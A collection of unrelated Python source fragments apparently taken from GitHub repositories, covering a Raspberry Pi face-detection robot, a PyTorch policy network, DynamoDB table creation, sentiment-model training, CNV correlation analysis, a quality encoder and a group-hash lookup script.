gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
#Look for faces in the image using the loaded cascade file
faces = face_cascade.detectMultiScale(gray, 1.1, 5)
#print "Found "+str(len(faces))+" face(s)"
#Draw a rectangle around every found face
for (x,y,w,h) in faces:
Face = 1
cv2.rectangle(image,(x,y),(x+w,y+h),(255,255,0),2)
print("Detected")
ser = serial.Serial(port, 9600, timeout=1)
t=0
while(t<2000):
if(t%10 == 0):
print(t)
t+=1
ser.write(b'0') ## Stop_Detected
with picamera.PiCamera() as camera:
print("Start Video")
camera.start_recording('examplevid.h264')
time.sleep(5)
camera.stop_recording()
print("Stop Video")
#Save the result image
if(i==3):
cv2.imwrite('result1.jpg',image)
if(i==2):
cv2.imwrite('result2.jpg',image)
if(i==1):
cv2.imwrite('result3.jpg',image)
i=i-1
if(Face == 1):
Face = 2
break
################ Move Servo ##################
if(i==0):
pwm.ChangeDutyCycle(3)
#ser.write(b'1') ## Move_Servo_pos1
print("First Pos__________________________")
if(i==2):
pwm.ChangeDutyCycle(5)
#ser.write(b'2') ## Move_Servo_pos2
print("Second Pos__________________________")
if(i==1):
pwm.ChangeDutyCycle(7)
#ser.write(b'3') ## Move_Servo_pos3
print("Third Pos__________________________")
t=0
while(t<200):
if(t%10 == 0):
print(t)
t+=1
print("###############################################");
t=0
while(t<500):
if(t%10 == 0):
print(t)
t+=1
# turn = 0
if(cv2.waitKey(1) & 0xFF == ord('q')):
break
if(Face == 2):
Face = 0
ser = serial.Serial(port, 9600, timeout=1)
t=0
while(t<2000):
if(t%10 == 0):
print(t)
t+=1
ser.write(b'1');
break
| FarhatBuet14/Rescue-BOT | Codes/main.py | main.py | py | 3,571 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "RPi.GPIO.setmode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "RPi.GPIO",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "RPi.GPIO.BOARD",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "RPi.GPIO.setup",
"l... |
2811075086 | from torch import optim
from torch.distributions import Categorical
import importlib
class Model():
def __init__(self, config, modelParam, env):
self.update_counter = 0
if modelParam['cuda']['use_cuda']:
self.device = f"cuda:{modelParam['cuda']['device_idx']}"
else:
self.device = "cpu"
self.config = config
self.modelParam = modelParam
self.policyNet = self.selectPolicyNet(config, env.size_of_state_space, env.size_of_action_space)
self.policyNet.to(self.device)
self.optimizer = self.selectOptimizer(config)
return
def selectPolicyNet(self, config, size_of_state_space, size_of_action_space):
#Importing the network class based on the config[network] key
module = importlib.import_module("networks." + config['network'])
net = getattr(module, config['network'])(size_of_state_space, size_of_action_space)
return net
def selectOptimizer(self, config):
if config['optimizer'] == 'adam':
optimizer = optim.Adam(self.policyNet.parameters(), lr=config['learningRate']['lr'], weight_decay=config['weight_decay'])
elif config['optimizer'] == 'SGD':
optimizer = optim.SGD(self.policyNet.parameters(), lr=config['learningRate']['lr'],weight_decay=config['weight_decay'])
elif config['optimizer'] == 'RMSprop':
optimizer = optim.RMSprop(self.policyNet.parameters(), lr=config['learningRate']['lr'],weight_decay=config['weight_decay'])
else:
raise Exception('invalid optimizer')
return optimizer
def select_action(self, state):
state = state.to(self.device)
probs = self.policyNet(state)
m = Categorical(probs)
action = m.sample()
log_probs = m.log_prob(action)
return action.item(), log_probs
| ivartz/IN9400_exercises | week14/exercise/policy_learning/utils/model.py | model.py | py | 1,937 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "importlib.import_module",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.optim.Adam",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "torch.optim.SGD"... |
74207456423 | import argparse
import logging
log_debug = logging.getLogger("debugLog")
_available_commands = ["list"]
def get_parser(parent=None):
# Anomaly commands
conf_file_parser = argparse.ArgumentParser(add_help=False)
conf_file_parser.add_argument('--config_file', '--config_path', help='Path to config file', metavar='[path]',
dest="config_file")
if not parent:
admin = argparse.ArgumentParser(description='Deployment control', prog='deployment control',
parents=[conf_file_parser])
admin.add_argument("--debug", help="Run command in debug mode", dest="debug", action='store_true')
else:
admin = parent.add_parser('admin', help='Deployment control')
# Admin commands
admin_parser = argparse.ArgumentParser(add_help=False)
admin_parser.add_argument("list", help="List %(prog)ss")
admin_parser.add_argument('--host', help='Hostname or ip of target', metavar='[hostname]',
dest='target_host', default='all')
admin_parser.add_argument('--config-path', help='Path to config file', metavar='[path]',
dest="config_path", action='store')
# add more admin commands here
# Admin parser
admin_subcommands = admin.add_subparsers(dest="target")
admin_container = admin_subcommands.add_parser('container', prog='Container', parents=[admin_parser])
admin_node = admin_subcommands.add_parser('node', prog='Node', parents=[admin_parser])
admin_network = admin_subcommands.add_parser('network', prog='Network', parents=[admin_parser])
admin_network.add_argument('--interface', help='Name of interface', type=str, metavar='[NAME]',
dest="target_interface")
admin_deployment = admin_subcommands.add_parser('deployment', prog='Deployment', parents=[admin_parser])
if parent:
return parent
else:
return admin
def parse_arguments(args):
args = vars(args)
unpacked = unpack_targets(args)
unpacked.update(unpack_params(args))
log_debug.debug("Unpacked arguments" + str(unpacked))
return unpacked
def unpack_targets(args):
_unpacked = dict()
for arg in args:
if "target" in arg and args[arg]:
param_split = arg.split("_")
if len(param_split) > 1:
_unpacked[param_split[1]] = args[arg]
else:
_unpacked[arg] = args[arg]
return {"target": _unpacked}
def unpack_params(args):
_unpacked = dict()
for arg in args:
if arg in _available_commands:
return {"action": arg}
| Ydjeen/openstack_anomaly_injection | openstack_anomaly_injection/anomaly_injection/node_control/config/argparser.py | argparser.py | py | 2,668 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "argp... |
7305309200 | import serial
import serial
from time import sleep
import threading
import time
# sudo chmod 666 /dev/ttyACM0
device_port = "/dev/ttyACM0"
from multiprocessing.pool import ThreadPool
import settings
class uwb_data(threading.Thread):
def __init__(self,file_name,device_port):
threading.Thread.__init__(self)
self.file_name = file_name
self.serial = serial.Serial(device_port)
self.running = True
self.myval = []
def create_csv_file(self):
self.f = open(self.file_name, 'w+')
self.f.write("timestamp,x,y,z \n")
sleep(1)
def store_uwb_data(self):
val = str(self.serial.readline().decode().strip(' \r\n'))
if val.startswith('+DPOS:'):
val = val.strip('+DPOS:')
val = val.split(',')
self.myval = [int(float(val[2])),int(float(val[3]))]
def get_uwb_data(self):
return self.myval
def run(self):
while self.running:
self.store_uwb_data()
settings.myList = self.get_uwb_data()
def terminate(self):
"""clean stop"""
self.running = False
if __name__ == "__main__":
uwb_get_way = uwb_data('IDRdata.csv',"/dev/ttyACM0")
uwb_get_way.start()
pool = ThreadPool(processes=1)
try:
while True:
async_result = pool.apply_async(uwb_get_way.get_uwb_data)
return_val = async_result.get()
print(settings.myList)
except (KeyboardInterrupt, SystemExit):
uwb_get_way.terminate()
print("killed") | CoRotProject/FOF-API | Agents/UWB_agent/uwb_data.py | uwb_data.py | py | 1,567 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": ... |
35864084249 | from __future__ import print_function
import boto3
#This module creates a table with the table constraints as well
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', endpoint_url='http://localhost:8000', aws_access_key_id='Secret', aws_secret_access_key='Secret')
table = dynamodb.create_table(
TableName = 'Movies',
KeySchema=[
{
'AttributeName': 'year',
'KeyType': 'HASH' #Partition key
},
{
'AttributeName': 'title',
'KeyType': 'RANGE' #Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'year',
'AttributeType': 'N'
},
{
'AttributeName': 'title',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
) | Codexdrip/DynamoDB-Testing | MoviesCreateTable.py | MoviesCreateTable.py | py | 894 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.resource",
"line_number": 6,
"usage_type": "call"
}
] |
7494741687 | """Train a model on Treebank"""
import random
import json
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as sched
import torch.utils.data as data
import utils
from collections import OrderedDict
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from args import get_train_args
from models import investorConferenceAnalyzer
from utils import Treebank, collate_fn
def main(args):
# Set up logging and devices
args.save_dir = utils.get_save_dir(args.save_dir, args.name, training=True)
log = utils.get_logger(args.save_dir, args.name)
tbx = SummaryWriter(args.save_dir)
device, args.gpu_ids = utils.get_available_devices()
log.info(f'Args: {json.dumps(vars(args), indent=4, sort_keys=True)}')
args.batch_size *= max(1, len(args.gpu_ids))
# Set random seed
log.info(f'Using random seed {args.seed}...')
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
# Get model
log.info('Building model...')
model = investorConferenceAnalyzer(args.pce_model, args.num_labels)
model = nn.DataParallel(model, args.gpu_ids)
if args.load_path:
log.iofo(f'Loading checkpoint from {args.load_path}...')
model, step = utils.load_model(model, args.load_path, args.gpu_ids)
else:
step = 0
model = model.to(device)
model.train()
ema = utils.EMA(model, args.ema_decay)
# Get saver
saver = utils.CheckpointSaver(args.save_dir,
max_checkpoints=args.max_checkpoints,
metric_name=args.metric_name,
maximize_metric=args.maximize_metric,
log=log)
# Get optimizer and scheduler
optimizer_grouped_params = [
{'params': model.module.classifier.albert.parameters()},
{'params': model.module.classifier.classifier.parameters(), 'lr': args.lr_c}
]
optimizer = optim.AdamW(optimizer_grouped_params, args.lr,
weight_decay=args.l2_wd)
scheduler = sched.LambdaLR(optimizer, lambda s: 1.)
# Get data loader
log.info('Building dataset...')
train_dataset = Treebank(args.train_record_file)
train_loader = data.DataLoader(train_dataset,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.num_workers,
collate_fn=collate_fn)
dev_dataset = Treebank(args.dev_record_file)
dev_loader = data.DataLoader(dev_dataset,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.num_workers,
collate_fn=collate_fn)
# Train
log.info('Training...')
steps_till_eval = args.eval_steps
epoch = step // len(train_dataset)
while epoch != args.num_epochs:
epoch += 1
log.info(f'Starting epoch {epoch}...')
with torch.enable_grad(), \
tqdm(total=len(train_dataset)) as progress_bar:
for input_idxs, token_type_idxs, attention_masks, ys, ids in train_loader:
# Set up for forward
input_idxs = input_idxs.to(device)
token_type_idxs = token_type_idxs.to(device)
attention_masks = attention_masks.to(device)
batch_size = input_idxs.size(0)
optimizer.zero_grad()
# Forward
log_p = model(input_idxs, token_type_idxs, attention_masks)
ys = ys.to(device)
if args.smoothing:
loss = utils.nll_loss_label_smoothing(log_p, ys, args.eps)
else:
loss = F.nll_loss(log_p, ys)
loss_val = loss.item()
# Backward
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
ema(model, step // batch_size)
# Log info
step += batch_size
progress_bar.update(batch_size)
progress_bar.set_postfix(epoch=epoch, NLL=loss_val)
tbx.add_scalar('train/NLL', loss_val, step)
tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)
steps_till_eval -= batch_size
if steps_till_eval <= 0:
steps_till_eval = args.eval_steps
# Evaluate and save checkpoint
log.info(f'Evaluating at step {step}...')
ema.assign(model)
results, pred_dict = evaluate(model, dev_loader,
device, args.dev_eval_file)
saver.save(step, model, results[args.metric_name], device)
ema.resume(model)
# Log to console
results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())
log.info(f'Dev {results_str}')
# Log to TensorBoard
log.info('Visualizing in TensorBoard...')
for k, v in results.items():
tbx.add_scalar(f'dev/{k}', v, step)
utils.visualize(tbx,
pred_dict=pred_dict,
eval_path=args.dev_eval_file,
step=step,
split='dev',
num_visuals=args.num_visuals)
def evaluate(model, data_loader, device, eval_file):
nll_meter = utils.AverageMeter()
model.eval()
pred_dict = {}
# Load eval info
with open(eval_file, 'r') as fh:
gold_dict = json.load(fh)
with torch.no_grad(), \
tqdm(total=len(data_loader.dataset)) as progress_bar:
for input_idxs, token_type_idxs, attention_masks, ys, ids in data_loader:
# Set up for forward
input_idxs = input_idxs.to(device)
token_type_idxs = token_type_idxs.to(device)
attention_masks = attention_masks.to(device)
batch_size = input_idxs.size(0)
# Forward
log_p = model(input_idxs, token_type_idxs, attention_masks)
ys = ys.to(device)
loss = F.nll_loss(log_p, ys)
nll_meter.update(loss.item(), batch_size)
# Log info
progress_bar.update(batch_size)
progress_bar.set_postfix(NLL=nll_meter.avg)
# Get accuracy
p = log_p.exp()
labels = torch.argmax(p, dim=-1)
preds = utils.predict_sentiments(ids.tolist(), labels.tolist())
pred_dict.update(preds)
model.train()
results = utils.eval_dicts(gold_dict, pred_dict)
results_list = [('NLL', nll_meter.avg),
('Acc', results['Acc'])]
results = OrderedDict(results_list)
return results, pred_dict
if __name__ == '__main__':
main(get_train_args()) | Vincent25-Li/Treebank | train.py | train.py | py | 7,389 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "args.save_dir",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "utils.get_save_dir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "args.name",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "utils.get_logger... |
2515032447 | import sys
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.stats
from collections import defaultdict
from matplotlib import pyplot as plt
from sklearn.metrics import r2_score, mean_absolute_error
#plt.style.use('seaborn-whitegrid')
#sns.set_theme()
#Function for creating a dictionary from the epiAneufinder data
def createDictionaryFromTable(table):
snu_dict=table.set_index(['seq', 'start', 'end']).T.to_dict('list')
return(snu_dict)
def calculatePopulationSomies(atac_dict, density_dict):
gain_atac = []
loss_atac = []
base_atac = []
common_keys = set(density_dict).intersection(atac_dict) #filtering for the common CNV locations between the two datasets
sort_common_keys=sorted(common_keys)
filtered_density_dict = {k: v for k, v in density_dict.items() if k in sort_common_keys}
#print(sort_common_keys)
counts=0
for k in sort_common_keys:
#if k[0]!=0: #selecting for all chromosomes
if k[0]!=0: # selecting for all chromosomes
counts=counts+1
#Calculating pseudobulk representation for the scATAC. 0 is loss, 1 is disomic and 2 is gain
#If the user changes notation it should be changed here as well
loss_atac.append(atac_dict[k].count(0) / len(atac_dict[k]))
base_atac.append(atac_dict[k].count(1) / len(atac_dict[k]))
gain_atac.append(atac_dict[k].count(2) / len(atac_dict[k]))
print("Count Bins:",counts)
return(loss_atac, base_atac, gain_atac, filtered_density_dict)
#Function for calculating different metrics between the two datasets and creating a line plot of the pseudoibulk data
def createLinePlot(density_dict, loss_atac, base_atac, gain_atac):
new_base_atac = [x * 2 for x in base_atac]
new_gain_atac = [x * 3 for x in gain_atac]
atac_plot = [sum(x) for x in zip(new_gain_atac, new_base_atac, loss_atac)]
atac_array=np.array(atac_plot)
density_array=[x for x in density_dict.values()]
x = list(range(len(atac_plot)))
plt.plot(x,density_array)
plt.plot(x, atac_plot, color='orange', label="ATAC")
plt.show()
#print(density_array)
print("Pearson Correlation : ",scipy.stats.pearsonr(atac_array, density_array))
print("Spearman Correlation : ", scipy.stats.spearmanr(atac_array, density_array))
print("Kendall Correlation : ", scipy.stats.kendalltau(atac_array, density_array))
if __name__ =="__main__":
density_table=pd.read_csv("/home/katia/Helmholz/epiAneufinder/Hg38_geneDensity.csv", sep="\t")
snu_full=pd.read_csv("/home/katia/Helmholz/epiAneufinder/revisions/SNU601_br15/epiAneufinder_results/results_table.tsv", sep=" ")
snu_dict=createDictionaryFromTable(snu_full)
density_dict=createDictionaryFromTable(density_table)
loss_atac, base_atac, gain_atac , filtered_density_dict= calculatePopulationSomies(snu_dict,density_dict)
#print(filtered_density_dict)
createLinePlot(filtered_density_dict, loss_atac, base_atac, gain_atac) | thek71/epiScripts | calculateCorrelationDensity.py | calculateCorrelationDensity.py | py | 3,000 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplo... |
32624805079 | from torch import nn
import torch
import numpy as np
import os
class Encoder(nn.Module):
def __init__(self, latent_dims, qc_level):
super(Encoder, self).__init__()
dims = []
if qc_level == 1:
dims = [17, 24, 8, latent_dims]
elif qc_level == 2:
dims = [22, 36, 12, latent_dims]
elif qc_level == 3:
dims = [8, 12, latent_dims]
if qc_level == 3:
self.linear1 = None
self.linear2 = nn.Linear(dims[0], dims[1])
self.linear2_bn = nn.BatchNorm1d(dims[1])
self.linear3A = nn.Linear(dims[1], dims[2])
self.linear3B = nn.Linear(dims[1], dims[2])
else:
self.linear1 = nn.Linear(dims[0], dims[1])
self.linear1_bn = nn.BatchNorm1d(dims[1])
self.linear2 = nn.Linear(dims[1], dims[2])
self.linear2_bn = nn.BatchNorm1d(dims[2])
self.linear3A = nn.Linear(dims[2], dims[3])
self.linear3B = nn.Linear(dims[2], dims[3])
def forward(self, x):
if self.linear1 is not None:
x = torch.tanh(self.linear1(x))
x = torch.tanh(self.linear1_bn(x))
x = torch.tanh(self.linear2(x))
x = torch.tanh(self.linear2_bn(x))
mu = self.linear3A(x)
logvar = self.linear3B(x)
return mu, logvar
class QualityEncoder(object):
def __init__(self, device='auto', encoder_type1_path=None, encoder_type2_path=None, encoder_type3_path=None, encoder_dim = [2, 2, 2]):
self.encoder_type1_path = encoder_type1_path
self.encoder_type2_path = encoder_type2_path
self.encoder_type3_path = encoder_type3_path
if not self.encoder_type1_path:
self.encoder_type1_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type1.pickle')
if not self.encoder_type2_path:
self.encoder_type2_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type2.pickle')
if not self.encoder_type3_path:
self.encoder_type3_path = os.path.join(os.path.split(__file__)[0], 'encoder', 'quality_encoder_type3.pickle')
self.type1_encoder = Encoder(encoder_dim[0], qc_level=1)
self.type2_encoder = Encoder(encoder_dim[1], qc_level=2)
self.type3_encoder = Encoder(encoder_dim[2], qc_level=3)
self.type1_quality_refs = [
[0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 1.0, 0.0, 0.0],
[0.3, 0.4, 0.3, 0.3, 0.335, 0.475, 0.3, 0.3, 0.4, 0.3, 0.3, 0.335, 0.475, 0.3, 0.7, 0.3, 0.3],
[1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 0.0, 1.0, 1.0],
[0.0, 1.0, 0.0, 0.0, 0.050, 0.250, 0.0, 1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 1.0],
[1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 5.0, 0.0, 1.0, 1.0]
]
self.type2_quality_refs = [
[0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200, 0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200, 1.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.200, 0.200],
[0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360, 0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360, 0.6, 0.2, 0.6, 0.6, 0.2, 0.2, 0.360, 0.360],
[1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 0.0, 1.0, 1.0, 0.0, 0.0, 0.050, 0.250, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000], # good heavy only; worst others
[0.0, 1.0, 1.0, 0.0, 0.0, 0.050, 0.250, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000], # bad heavy only
[1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000, -1.0, 1.0, -1.0, -1.0, 1.0, 1.0, 1.000, 1.000]
]
self.type3_quality_refs = [
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.5, 0.3, 0.9, 1.5, 0.3, 0.9, 0.3, 0.3],
[5.0, 1.0, 3.0, 0.0, 0.0, 0.0, 1.0, 1.0],
[0.0, 0.0, 0.0, 5.0, 1.0, 3.0, 1.0, 1.0],
[5.0, 1.0, 3.0, 5.0, 1.0, 3.0, 1.0, 1.0]
]
if device == 'auto':
self.device = "cuda" if torch.cuda.is_available() else "cpu"
else:
self.device = device
print('device: ' + self.device)
self.load_encoder()
self._update_reference_latents()
def __call__(self, quality_vectors, normalize=True):
qv = torch.tensor(quality_vectors, dtype=torch.float32).to(self.device)
dim = qv.shape[1]
if dim == 17:
latent = self.type1_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type1_latent(latent)
type = 1
elif dim == 22:
latent = self.type2_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type2_latent(latent)
type = 2
elif dim == 8:
latent = self.type3_encoder(qv)[0].cpu().detach().numpy()
score = self.score_type3_latent(latent)
type = 3
else:
raise 'Unkonw dimension. Valid dimensions are 17 for type 1 quality, 22 for type 2 quality, and 8 for type 3 quality.'
if normalize:
return self.normalize_score(type, score), latent
else:
return score, latent
def load_encoder(self):
self.type1_encoder.load_state_dict(torch.load(self.encoder_type1_path, map_location=self.device))
self.type2_encoder.load_state_dict(torch.load(self.encoder_type2_path, map_location=self.device))
self.type3_encoder.load_state_dict(torch.load(self.encoder_type3_path, map_location=self.device))
self.type1_encoder.to(self.device)
self.type2_encoder.to(self.device)
self.type3_encoder.to(self.device)
self.type1_encoder.eval()
self.type2_encoder.eval()
self.type3_encoder.eval()
self._update_reference_latents()
def _update_reference_latents(self):
self.type1_latent_points = self.type1_encoder(torch.tensor(self.type1_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self.type2_latent_points = self.type2_encoder(torch.tensor(self.type2_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self.type3_latent_points = self.type3_encoder(torch.tensor(self.type3_quality_refs).to(self.device))[0].to('cpu').detach().numpy()
self._score_range = [
dict(max= self.score_type1_latent([self.type1_latent_points[0]])[0], min=self.score_type1_latent([self.type1_latent_points[4]])[0]),
dict(max= self.score_type2_latent([self.type2_latent_points[0]])[0], min=self.score_type2_latent([self.type2_latent_points[4]])[0]),
dict(max= self.score_type3_latent([self.type3_latent_points[0]])[0], min=self.score_type3_latent([self.type3_latent_points[4]])[0])
]
def encode_quality(self, quality_vectors):
qv = torch.tensor(quality_vectors, dtype=torch.float32).to(self.device)
dim = qv.shape[1]
if dim == 17:
return self.type1_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
elif dim == 22:
return self.type2_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
elif dim == 8:
return self.type3_encoder(torch.tensor(qv, dtype=torch.float32).to(self.device))[0].detach().numpy()
else:
raise 'Unkonw dimension. Valid dimensions are 17 for type 1 quality, 22 for type 2 quality, and 8 for type 3 quality.'
# def encode_type1_quality(self, quality_vector):
# return self.type1_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
# def encode_type2_quality(self, quality_vector):
# return self.type2_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
# def encode_type3_quality(self, quality_vector):
# return self.type3_encoder(torch.tensor(quality_vector, dtype=torch.float32).to(self.device))[0].detach().numpy()
def score_type1_latent(self, type1_latents):
return self.score_func(type1_latents, self.type1_latent_points)
def score_type2_latent(self, type2_latents):
return self.score_func(type2_latents, self.type2_latent_points)
def score_type3_latent(self, type3_latents):
return self.score_func(type3_latents, self.type3_latent_points)
def normalize_score(self, type, score):
if type <= 0 or type >=4:
return
min = self._score_range[type - 1]['min']
max = self._score_range[type - 1]['max']
return -10 + 20 * ((score - min)/(max - min))
def score_func(self, latent_points, ref_latent_points):
# ref_latent_points = self._ref_latent_points
dist_max = np.linalg.norm(ref_latent_points[0] - ref_latent_points[4])
score = 2 * (1 - (self.dist_func(latent_points, ref_latent_points[0])/dist_max)**0.5)
score = score + 1 * (1 - (self.dist_func(latent_points, ref_latent_points[1])/dist_max)**0.5)
score = score + 1 * (1 - (self.dist_func(latent_points, ref_latent_points[2])/dist_max)**0.5)
score = score - 1 * (1 - (self.dist_func(latent_points, ref_latent_points[3])/dist_max)**0.5)
score = score - 2 * (1 - (self.dist_func(latent_points, ref_latent_points[4])/dist_max)**0.5)
return score
def dist_func(self, a, b):
return np.linalg.norm(a - b, axis=1)
| chiyang/tmasque | tmasque/QualityEncoder.py | QualityEncoder.py | py | 8,839 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_numb... |
21892894147 | from django.urls import path
from accounts import views
app_name='accounts'
urlpatterns=[
path('register',views.register,name='register'),
path('login',views.login,name='login'),
path('logout',views.logout,name='logout'),
path('page1',views.page1,name='page1'),
path('r^create_view/',views.create_view,name='create_view'),
path('<int:pk>/', views.person_update_view, name='person_change'),
path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'),#AJAX
path('msg/',views.msg,name='msg')
] | amalarosebenny/farming | collegeproject/accounts/urls.py | urls.py | py | 533 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "accounts.views.register",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "accounts.views",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.urls... |
20886565147 | #!/usr/bin/env python
"""
Identifies groups of medium order (512, 1152, 1536, 1920, 2187, 6561, 15625, 16807, 78125, 161051)
by connecting to devmirror.lmfdb.xyz and using the stored hashes there.
Usage:
Either provide an input file with hashes to identify, one per line, each of the form N.i
./identify.py -i INPUT_FILE.txt -o OUTPUT_FILE.txt
or provide the input
or provide the input at the command line, separated by newlines
./identify.py < echo "512.1"
Output is written to the designated output file, or sent to stdout (if no output file given)
"""
import os
import sys
import argparse
from collections import defaultdict
from psycopg2 import connect
from psycopg2.sql import SQL, Identifier
## We avoid using the LMFDB to eliminate the dependency on Sage
#opj, ops, ope = os.path.join, os.path.split, os.path.exists
#root = os.getcwd()
## This repo contains an LMFDB folder, and some OSes (like OS X) are not case sensitive
#while not (ope(opj(root, "lmfdb")) and ope(opj(root, "lmfdb", "start-lmfdb.py"))):
# newroot = ops(root)[0]
# if root == newroot:
# raise ModuleNotFoundError("No path to the LMFDB in the current directory")
# root = newroot
#sys.path.append(opj(root, "lmfdb"))
# Importing db from the LMFDB prints a bunch of garbage, so we disable printing for a bit
#savedstdout = sys.stdout
#savedstderr = sys.stderr
#with open(os.devnull, 'w') as F:
# try:
# sys.stdout = F
# sys.stderr = F
# from lmfdb import db
# finally:
# sys.stdout = savedstdout
# sys.stderr = savedstderr
SMALLHASHED = [512, 1152, 1536, 1920, 2187, 6561, 15625, 16807, 78125, 161051]
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="file containing the hashes to identify, one per line, each of the form N.hsh")
parser.add_argument("-o", "--output", help="file to write the output, lines corresponding to input")
parser.add_argument("hashes", nargs="*", help="input hashes at the command line")
args = parser.parse_args()
if args.hashes:
hashes = args.hashes
elif args.input:
with open(args.input) as F:
hashes = list(F)
else:
hashes = sys.stdin.read().split("\n")
# The following code will need to be updated once gps_groups has hashes and we support identification of larger groups
hashes = [tuple(int(c) for c in hsh.split(".")) for hsh in hashes if hsh.strip()]
hashlookup = defaultdict(list)
## Reduce number of database calls by grouping by order
byord = defaultdict(set)
for N, hsh in hashes:
if N in SMALLHASHED:
byord[N].add(hsh)
for N in list(byord):
byord[N] = sorted(byord[N])
#if len(byord) > 1:
# query = {"$or": [{"order": N, "hash": ({"$in": L} if len(L) > 1 else L[0])} for (N, L) in byord.items()]}
#else:
# N = list(byord)[0]
# L = byord[N]
# query = {"order": N, "hash": ({"$in": L} if len(L) > 1 else L[0])}
#for rec in db.gps_smallhash.search(query, silent=True):
# hashlookup[rec["order"], rec["hash"]].append(f'{rec["order"]}.{rec["counter"]}')
# We set up the connection manually using psycopg2 to remove dependencies on the LMFDB and Sage for code running on google cloud
conn = connect(dbname="lmfdb", user="lmfdb", password="lmfdb", host="devmirror.lmfdb.xyz")
cur = conn.cursor()
it = byord.items()
opt1 = SQL("({0} = %s AND {1} = ANY(%s))").format(Identifier("order"), Identifier("hash"))
opt2 = SQL("({0} = %s AND {1} = %s)").format(Identifier("order"), Identifier("hash"))
query = SQL(" OR ").join(opt1 if len(L) > 1 else opt2 for (N, L) in it)
values = []
for N, L in it:
if len(L) > 1:
values.extend([N, L])
else:
values.extend([N, L[0]])
